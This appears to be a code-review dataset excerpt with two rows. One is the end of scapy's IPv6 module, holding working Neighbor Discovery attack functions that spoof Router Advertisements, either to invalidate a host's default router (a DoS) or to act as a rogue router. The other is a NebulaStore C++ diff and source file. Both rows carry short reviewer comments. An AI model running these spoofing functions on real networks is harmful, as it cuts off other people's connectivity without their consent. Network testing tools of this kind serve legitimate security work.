The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
# Add it a PIO from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print("Fake RA sent with source address %s" % src)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
The purpose of this function is to send provided RA message at layer 2
(i.e. providing a packet starting with IPv6 will not work) in response
to received RS messages. In the end, the function is a simple wrapper
around sendp() that monitor the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
Note that no changes to provided RA is done which imply that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
replies. Same comment as for previous argument apply: if you use
the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print("Fake RA sent in response to RS from %s" % src)
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, _IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(GRE, IPv6, proto = 0x86dd )
bind_layers(Loopback, IPv6, type = 0x1c )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
bind_layers(IPv6, GRE, nh = socket.IPPROTO_GRE )
| 1 | 10,289 | `isinstance(ip6, Net6)` instead | secdev-scapy | py |
@@ -359,10 +359,12 @@ ResultCode NebulaStore::get(GraphSpaceID spaceId,
}
-ResultCode NebulaStore::multiGet(GraphSpaceID spaceId,
- PartitionID partId,
- const std::vector<std::string>& keys,
- std::vector<std::string>* values) {
+ErrorOr<ResultCode, std::vector<Status>> NebulaStore::multiGet(
+ GraphSpaceID spaceId,
+ PartitionID partId,
+ const std::vector<std::string>& keys,
+ std::vector<std::string>* values,
+ bool returnPartly) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret); | 1 | /* Copyright (c) 2018 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
#include "base/Base.h"
#include "kvstore/NebulaStore.h"
#include <folly/Likely.h>
#include <algorithm>
#include <cstdint>
#include "network/NetworkUtils.h"
#include "fs/FileUtils.h"
#include "kvstore/RocksEngine.h"
#include "kvstore/SnapshotManagerImpl.h"
DEFINE_string(engine_type, "rocksdb", "rocksdb, memory...");
DEFINE_int32(custom_filter_interval_secs, 24 * 3600, "interval to trigger custom compaction");
DEFINE_int32(num_workers, 4, "Number of worker threads");
DEFINE_bool(check_leader, true, "Check leader or not");
namespace nebula {
namespace kvstore {
NebulaStore::~NebulaStore() {
LOG(INFO) << "Cut off the relationship with meta client";
options_.partMan_.reset();
LOG(INFO) << "Stop the raft service...";
raftService_->stop();
LOG(INFO) << "Waiting for the raft service stop...";
raftService_->waitUntilStop();
spaces_.clear();
bgWorkers_->stop();
bgWorkers_->wait();
LOG(INFO) << "~NebulaStore()";
}
bool NebulaStore::init() {
LOG(INFO) << "Start the raft service...";
bgWorkers_ = std::make_shared<thread::GenericThreadPool>();
bgWorkers_->start(FLAGS_num_workers, "nebula-bgworkers");
snapshot_.reset(new SnapshotManagerImpl(this));
raftService_ = raftex::RaftexService::createService(ioPool_,
workers_,
raftAddr_.second);
if (!raftService_->start()) {
LOG(ERROR) << "Start the raft service failed";
return false;
}
CHECK(!!options_.partMan_);
LOG(INFO) << "Scan the local path, and init the spaces_";
{
for (auto& path : options_.dataPaths_) {
auto rootPath = folly::stringPrintf("%s/nebula", path.c_str());
auto dirs = fs::FileUtils::listAllDirsInDir(rootPath.c_str());
for (auto& dir : dirs) {
LOG(INFO) << "Scan path \"" << path << "/" << dir << "\"";
try {
GraphSpaceID spaceId;
try {
spaceId = folly::to<GraphSpaceID>(dir);
} catch (const std::exception& ex) {
LOG(ERROR) << "Data path invalid: " << ex.what();
return false;
}
if (!options_.partMan_->spaceExist(storeSvcAddr_, spaceId).ok()) {
// TODO We might want to have a second thought here.
// Removing the data directly feels a little strong
LOG(INFO) << "Space " << spaceId
<< " does not exist any more, remove the data!";
auto dataPath = folly::stringPrintf("%s/%s",
rootPath.c_str(),
dir.c_str());
CHECK(fs::FileUtils::remove(dataPath.c_str(), true));
continue;
}
KVEngine* enginePtr = nullptr;
{
folly::RWSpinLock::WriteHolder wh(&lock_);
auto engine = newEngine(spaceId, path);
auto spaceIt = this->spaces_.find(spaceId);
if (spaceIt == this->spaces_.end()) {
LOG(INFO) << "Load space " << spaceId << " from disk";
spaceIt = this->spaces_.emplace(
spaceId,
std::make_unique<SpacePartInfo>()).first;
}
spaceIt->second->engines_.emplace_back(std::move(engine));
enginePtr = spaceIt->second->engines_.back().get();
}
// partIds is the partition in this host waiting to open
std::vector<PartitionID> partIds;
for (auto& partId : enginePtr->allParts()) {
if (!options_.partMan_->partExist(storeSvcAddr_, spaceId, partId).ok()) {
LOG(INFO) << "Part " << partId
<< " does not exist any more, remove it!";
enginePtr->removePart(partId);
continue;
} else {
partIds.emplace_back(partId);
}
}
if (partIds.empty()) {
continue;
}
std::atomic<size_t> counter(partIds.size());
folly::Baton<true, std::atomic> baton;
LOG(INFO) << "Need to open " << partIds.size() << " parts of space " << spaceId;
for (auto& partId : partIds) {
bgWorkers_->addTask([
spaceId, partId, enginePtr, &counter, &baton, this] () mutable {
auto part = std::make_shared<Part>(spaceId,
partId,
raftAddr_,
folly::stringPrintf("%s/wal/%d",
enginePtr->getDataRoot(),
partId),
enginePtr,
ioPool_,
bgWorkers_,
workers_,
snapshot_);
auto status = options_.partMan_->partMeta(spaceId, partId);
if (!status.ok()) {
LOG(WARNING) << status.status().toString();
return;
}
auto partMeta = status.value();
std::vector<HostAddr> peers;
for (auto& h : partMeta.peers_) {
if (h != storeSvcAddr_) {
peers.emplace_back(getRaftAddr(h));
VLOG(1) << "Add peer " << peers.back();
}
}
raftService_->addPartition(part);
part->start(std::move(peers), false);
LOG(INFO) << "Load part " << spaceId << ", " << partId << " from disk";
{
folly::RWSpinLock::WriteHolder holder(&lock_);
auto iter = spaces_.find(spaceId);
CHECK(iter != spaces_.end());
iter->second->parts_.emplace(partId, part);
}
counter.fetch_sub(1);
if (counter.load() == 0) {
baton.post();
}
});
}
baton.wait();
LOG(INFO) << "Load space " << spaceId << " complete";
} catch (std::exception& e) {
LOG(FATAL) << "Invalid data directory \"" << dir << "\"";
}
}
}
}
LOG(INFO) << "Init data from partManager for " << storeSvcAddr_;
auto partsMap = options_.partMan_->parts(storeSvcAddr_);
for (auto& entry : partsMap) {
auto spaceId = entry.first;
addSpace(spaceId);
std::vector<PartitionID> partIds;
for (auto it = entry.second.begin(); it != entry.second.end(); it++) {
partIds.emplace_back(it->first);
}
std::sort(partIds.begin(), partIds.end());
for (auto& partId : partIds) {
addPart(spaceId, partId, false);
}
}
LOG(INFO) << "Register handler...";
options_.partMan_->registerHandler(this);
return true;
}
std::unique_ptr<KVEngine> NebulaStore::newEngine(GraphSpaceID spaceId,
const std::string& path) {
if (FLAGS_engine_type == "rocksdb") {
std::shared_ptr<KVCompactionFilterFactory> cfFactory = nullptr;
if (options_.cffBuilder_ != nullptr) {
cfFactory = options_.cffBuilder_->buildCfFactory(spaceId,
FLAGS_custom_filter_interval_secs);
}
return std::make_unique<RocksEngine>(spaceId,
path,
options_.mergeOp_,
cfFactory);
} else {
LOG(FATAL) << "Unknown engine type " << FLAGS_engine_type;
return nullptr;
}
}
ErrorOr<ResultCode, HostAddr> NebulaStore::partLeader(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
auto& parts = it->second->parts_;
auto partIt = parts.find(partId);
if (UNLIKELY(partIt == parts.end())) {
return ResultCode::ERR_PART_NOT_FOUND;
}
return getStoreAddr(partIt->second->leader());
}
void NebulaStore::addSpace(GraphSpaceID spaceId) {
folly::RWSpinLock::WriteHolder wh(&lock_);
if (this->spaces_.find(spaceId) != this->spaces_.end()) {
LOG(INFO) << "Space " << spaceId << " has existed!";
return;
}
LOG(INFO) << "Create space " << spaceId;
this->spaces_[spaceId] = std::make_unique<SpacePartInfo>();
for (auto& path : options_.dataPaths_) {
this->spaces_[spaceId]->engines_.emplace_back(newEngine(spaceId, path));
}
}
void NebulaStore::addPart(GraphSpaceID spaceId, PartitionID partId, bool asLearner) {
folly::RWSpinLock::WriteHolder wh(&lock_);
auto spaceIt = this->spaces_.find(spaceId);
CHECK(spaceIt != this->spaces_.end()) << "Space should exist!";
if (spaceIt->second->parts_.find(partId) != spaceIt->second->parts_.end()) {
LOG(INFO) << "[" << spaceId << "," << partId << "] has existed!";
return;
}
int32_t minIndex = -1;
int32_t index = 0;
int32_t minPartsNum = 0x7FFFFFFF;
auto& engines = spaceIt->second->engines_;
for (auto& engine : engines) {
if (engine->totalPartsNum() < minPartsNum) {
minPartsNum = engine->totalPartsNum();
minIndex = index;
}
index++;
}
CHECK_GE(minIndex, 0) << "engines number:" << engines.size();
const auto& targetEngine = engines[minIndex];
// Write the information into related engine.
targetEngine->addPart(partId);
spaceIt->second->parts_.emplace(
partId,
newPart(spaceId, partId, targetEngine.get(), asLearner));
LOG(INFO) << "Space " << spaceId << ", part " << partId
<< " has been added, asLearner " << asLearner;
}
std::shared_ptr<Part> NebulaStore::newPart(GraphSpaceID spaceId,
PartitionID partId,
KVEngine* engine,
bool asLearner) {
auto part = std::make_shared<Part>(spaceId,
partId,
raftAddr_,
folly::stringPrintf("%s/wal/%d",
engine->getDataRoot(),
partId),
engine,
ioPool_,
bgWorkers_,
workers_,
snapshot_);
auto metaStatus = options_.partMan_->partMeta(spaceId, partId);
if (!metaStatus.ok()) {
return nullptr;
}
auto partMeta = metaStatus.value();
std::vector<HostAddr> peers;
for (auto& h : partMeta.peers_) {
if (h != storeSvcAddr_) {
peers.emplace_back(getRaftAddr(h));
VLOG(1) << "Add peer " << peers.back();
}
}
raftService_->addPartition(part);
part->start(std::move(peers), asLearner);
return part;
}
void NebulaStore::removeSpace(GraphSpaceID spaceId) {
folly::RWSpinLock::WriteHolder wh(&lock_);
auto spaceIt = this->spaces_.find(spaceId);
auto& engines = spaceIt->second->engines_;
for (auto& engine : engines) {
auto parts = engine->allParts();
for (auto& partId : parts) {
engine->removePart(partId);
}
CHECK_EQ(0, engine->totalPartsNum());
}
this->spaces_.erase(spaceIt);
// TODO(dangleptr): Should we delete the data?
LOG(INFO) << "Space " << spaceId << " has been removed!";
}
void NebulaStore::removePart(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::WriteHolder wh(&lock_);
auto spaceIt = this->spaces_.find(spaceId);
if (spaceIt != this->spaces_.end()) {
auto partIt = spaceIt->second->parts_.find(partId);
if (partIt != spaceIt->second->parts_.end()) {
auto* e = partIt->second->engine();
CHECK_NOTNULL(e);
raftService_->removePartition(partIt->second);
partIt->second->reset();
spaceIt->second->parts_.erase(partId);
e->removePart(partId);
}
}
LOG(INFO) << "Space " << spaceId << ", part " << partId << " has been removed!";
}
void NebulaStore::updateSpaceOption(GraphSpaceID spaceId,
const std::unordered_map<std::string, std::string>& options,
bool isDbOption) {
if (isDbOption) {
for (const auto& kv : options) {
setDBOption(spaceId, kv.first, kv.second);
}
} else {
for (const auto& kv : options) {
setOption(spaceId, kv.first, kv.second);
}
}
}
ResultCode NebulaStore::get(GraphSpaceID spaceId,
PartitionID partId,
const std::string& key,
std::string* value) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->get(key, value);
}
ResultCode NebulaStore::multiGet(GraphSpaceID spaceId,
PartitionID partId,
const std::vector<std::string>& keys,
std::vector<std::string>* values) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->multiGet(keys, values);
}
ResultCode NebulaStore::range(GraphSpaceID spaceId,
PartitionID partId,
const std::string& start,
const std::string& end,
std::unique_ptr<KVIterator>* iter) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->range(start, end, iter);
}
ResultCode NebulaStore::prefix(GraphSpaceID spaceId,
PartitionID partId,
const std::string& prefix,
std::unique_ptr<KVIterator>* iter) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->prefix(prefix, iter);
}
ResultCode NebulaStore::rangeWithPrefix(GraphSpaceID spaceId,
PartitionID partId,
const std::string& start,
const std::string& prefix,
std::unique_ptr<KVIterator>* iter) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->rangeWithPrefix(start, prefix, iter);
}
ResultCode NebulaStore::sync(GraphSpaceID spaceId,
PartitionID partId) {
auto partRet = part(spaceId, partId);
if (!ok(partRet)) {
return error(partRet);
}
auto part = nebula::value(partRet);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
auto ret = ResultCode::SUCCEEDED;
folly::Baton<true, std::atomic> baton;
part->sync([&] (kvstore::ResultCode code) {
ret = code;
baton.post();
});
baton.wait();
return ret;
}
void NebulaStore::asyncMultiPut(GraphSpaceID spaceId,
PartitionID partId,
std::vector<KV> keyValues,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncMultiPut(std::move(keyValues), std::move(cb));
}
void NebulaStore::asyncRemove(GraphSpaceID spaceId,
PartitionID partId,
const std::string& key,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncRemove(key, std::move(cb));
}
void NebulaStore::asyncMultiRemove(GraphSpaceID spaceId,
PartitionID partId,
std::vector<std::string> keys,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncMultiRemove(std::move(keys), std::move(cb));
}
void NebulaStore::asyncRemoveRange(GraphSpaceID spaceId,
PartitionID partId,
const std::string& start,
const std::string& end,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncRemoveRange(start, end, std::move(cb));
}
void NebulaStore::asyncRemovePrefix(GraphSpaceID spaceId,
PartitionID partId,
const std::string& prefix,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncRemovePrefix(prefix, std::move(cb));
}
void NebulaStore::asyncAtomicOp(GraphSpaceID spaceId,
PartitionID partId,
raftex::AtomicOp op,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncAtomicOp(std::move(op), std::move(cb));
}
ErrorOr<ResultCode, std::shared_ptr<Part>> NebulaStore::part(GraphSpaceID spaceId,
PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
auto& parts = it->second->parts_;
auto partIt = parts.find(partId);
if (UNLIKELY(partIt == parts.end())) {
return ResultCode::ERR_PART_NOT_FOUND;
}
return partIt->second;
}
ResultCode NebulaStore::ingest(GraphSpaceID spaceId) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto parts = engine->allParts();
for (auto part : parts) {
auto ret = this->engine(spaceId, part);
if (!ok(ret)) {
return error(ret);
}
auto path = folly::stringPrintf("%s/download/%d", value(ret)->getDataRoot(), part);
if (!fs::FileUtils::exist(path)) {
LOG(INFO) << path << " not existed";
continue;
}
auto files = nebula::fs::FileUtils::listAllFilesInDir(path.c_str(), true, "*.sst");
for (auto file : files) {
LOG(INFO) << "Ingesting extra file: " << file;
auto code = engine->ingest(std::vector<std::string>({file}));
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::setOption(GraphSpaceID spaceId,
const std::string& configKey,
const std::string& configValue) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->setOption(configKey, configValue);
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::setDBOption(GraphSpaceID spaceId,
const std::string& configKey,
const std::string& configValue) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->setDBOption(configKey, configValue);
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::compact(GraphSpaceID spaceId) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
auto code = ResultCode::SUCCEEDED;
std::vector<std::thread> threads;
for (auto& engine : space->engines_) {
threads.emplace_back(std::thread([&engine, &code] {
auto ret = engine->compact();
if (ret != ResultCode::SUCCEEDED) {
code = ret;
}
}));
}
// Wait for all threads to finish
for (auto& t : threads) {
t.join();
}
return code;
}
ResultCode NebulaStore::flush(GraphSpaceID spaceId) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->flush();
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::createCheckpoint(GraphSpaceID spaceId, const std::string& name) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->createCheckpoint(name);
if (code != ResultCode::SUCCEEDED) {
return code;
}
// create wal hard link for all parts
auto parts = engine->allParts();
for (auto& part : parts) {
auto ret = this->part(spaceId, part);
if (!ok(ret)) {
LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part;
return error(ret);
}
auto walPath = folly::stringPrintf("%s/checkpoints/%s/wal/%d",
engine->getDataRoot(), name.c_str(), part);
auto p = nebula::value(ret);
if (!p->linkCurrentWAL(walPath.data())) {
return ResultCode::ERR_CHECKPOINT_ERROR;
}
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::dropCheckpoint(GraphSpaceID spaceId, const std::string& name) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
/**
* Drop checkpoint and wal together
**/
auto checkpointPath = folly::stringPrintf("%s/checkpoints/%s",
engine->getDataRoot(),
name.c_str());
LOG(INFO) << "Drop checkpoint : " << checkpointPath;
if (!fs::FileUtils::exist(checkpointPath)) {
continue;
}
if (!fs::FileUtils::remove(checkpointPath.data(), true)) {
LOG(ERROR) << "Drop checkpoint dir failed : " << checkpointPath;
return ResultCode::ERR_IO_ERROR;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::setWriteBlocking(GraphSpaceID spaceId, bool sign) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto parts = engine->allParts();
for (auto& part : parts) {
auto partRet = this->part(spaceId, part);
if (!ok(partRet)) {
LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part;
return error(partRet);
}
auto p = nebula::value(partRet);
if (p->isLeader()) {
auto ret = ResultCode::SUCCEEDED;
p->setBlocking(sign);
if (sign) {
folly::Baton<true, std::atomic> baton;
p->sync([&ret, &baton] (kvstore::ResultCode code) {
if (kvstore::ResultCode::SUCCEEDED != code) {
ret = code;
}
baton.post();
});
baton.wait();
}
if (ret != ResultCode::SUCCEEDED) {
LOG(ERROR) << "Part sync failed. space : " << spaceId << " Part : " << part;
return ret;
}
}
}
}
return ResultCode::SUCCEEDED;
}
bool NebulaStore::isLeader(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto spaceIt = spaces_.find(spaceId);
if (spaceIt != this->spaces_.end()) {
auto partIt = spaceIt->second->parts_.find(partId);
if (partIt != spaceIt->second->parts_.end()) {
return partIt->second->isLeader();
} else {
return false;
}
}
return false;
}
ErrorOr<ResultCode, KVEngine*> NebulaStore::engine(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
auto& parts = it->second->parts_;
auto partIt = parts.find(partId);
if (UNLIKELY(partIt == parts.end())) {
return ResultCode::ERR_PART_NOT_FOUND;
}
return partIt->second->engine();
}
ErrorOr<ResultCode, std::shared_ptr<SpacePartInfo>> NebulaStore::space(GraphSpaceID spaceId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
return it->second;
}
int32_t NebulaStore::allLeader(std::unordered_map<GraphSpaceID,
std::vector<PartitionID>>& leaderIds) {
folly::RWSpinLock::ReadHolder rh(&lock_);
int32_t count = 0;
for (const auto& spaceIt : spaces_) {
auto spaceId = spaceIt.first;
for (const auto& partIt : spaceIt.second->parts_) {
auto partId = partIt.first;
if (partIt.second->isLeader()) {
leaderIds[spaceId].emplace_back(partId);
++count;
}
}
}
return count;
}
bool NebulaStore::checkLeader(std::shared_ptr<Part> part) const {
return !FLAGS_check_leader || part->isLeader();
}
} // namespace kvstore
} // namespace nebula
| 1 | 28,238 | Do we really need the param here? If only partial results returned, we could return ResultCode::PARTIAL_RESULTS; | vesoft-inc-nebula | cpp |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.